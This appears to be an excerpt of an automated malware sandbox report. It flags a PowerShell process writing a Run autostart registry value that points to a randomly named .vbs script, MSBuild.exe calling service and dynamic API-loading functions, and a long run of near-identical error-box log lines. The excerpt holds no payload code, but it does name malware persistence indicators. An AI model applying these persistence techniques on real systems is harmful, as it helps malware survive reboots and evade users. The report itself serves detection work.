Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

27_2_00419BD4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

13_2_004047CB

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
